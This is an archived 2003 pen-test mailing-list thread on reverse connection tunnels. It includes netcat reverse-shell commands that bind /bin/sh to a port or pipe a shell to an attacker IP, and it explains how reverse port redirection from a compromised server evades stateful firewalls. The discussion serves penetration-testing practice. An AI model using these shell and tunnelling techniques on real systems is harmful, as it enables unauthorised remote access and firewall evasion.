RE: command-line reverse connection tunnel?

From: Steven Gill (gman1120@hotmail.com)
Date: Sun Mar 16 2003 - 22:26:33 EST


Yes, you can use netcat to send a shell back, but it is a pain to use it for
port redirection. E.G. for a shell you can:

nc -l -p <port> -e /bin/sh

or

nc <attacker ip> 1234 | /bin/sh | nc <attacker ip> 1235 and have stdin and
stdout connected to the above ports respectively. But we want to use more
robust services other than shell, such as getting GUI on Windows via
terminal services or other more complex protocols.

Lets take for example a service on a machine that is not nat'd but a border
server we can compromise has access to it.

You can use rinetd, fpipe, stunnel, etc for forward redirection. In these
cases, there needs to be 2 holes punched through on the server, 1 for the
shell used to compromised the server (like www or telnet) and then the port
for the redirector to listen on. Revinetd is used for port redirection
where the server appears to be the initiator of the connectivity. You
theoretically only need one port open in the forward direction which is the
shell. All other connectivity is intiated outbound from the server, so a
stateful firewall would see the port redirector traffic as NEW in the
connection table from the server, allowing us to utilize more liberal rule
sets that we know most organizations allow.

Now I know revinetd is not the only thing to use for it. It was brought to
my attention that socat can be used for this, but I wanted a tool that was
just used for reverse port forwarding and was intuitive to use.

I hope this answers your question.

Steve

>From: "Filip Maertens" <filip@securax.be>
>To: "'Steven Gill'" <gman1120@hotmail.com>,<pen-test@securityfocus.com>
>Subject: RE: command-line reverse connection tunnel?
>Date: Sat, 15 Mar 2003 23:57:32 +0100
>
> >have successfully tested it in a pen test stituation in the lab for
>doing
> >reverse connectivity. I think this would be a valuable tool for all
>people
>
>I beg to differ.
>
>What exactly is different from using netcat listeners on both,
>attack-client and target machine? All in all, using a reverse telnet
>technique using netcat isn't very much a big an issue? I think this is
>a handy tool, but I would like to emphasize one can also use netcat in
>doing so (if this had been mentioned before in the "old posts",
>disregard this post, since I didn't followed this thread).
>
>
>Fil
>
>--
>Filip Maertens @ Home
>http://www.compsec.be
>
>
>----------------------------------------------------------------------------
>Did you know that you have VNC running on your network?
>Your hacker does. Plug your security holes now!
>Download a free 15-day trial of VAM:
>http://www2.stillsecure.com/download/sf_vuln_list.html

_________________________________________________________________
MSN 8 helps eliminate e-mail viruses. Get 2 months FREE*.
http://join.msn.com/?page=features/virus

----------------------------------------------------------------------------
Did you know that you have VNC running on your network?
Your hacker does. Plug your security holes now!
Download a free 15-day trial of VAM:
http://www2.stillsecure.com/download/sf_vuln_list.html



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:30 EDT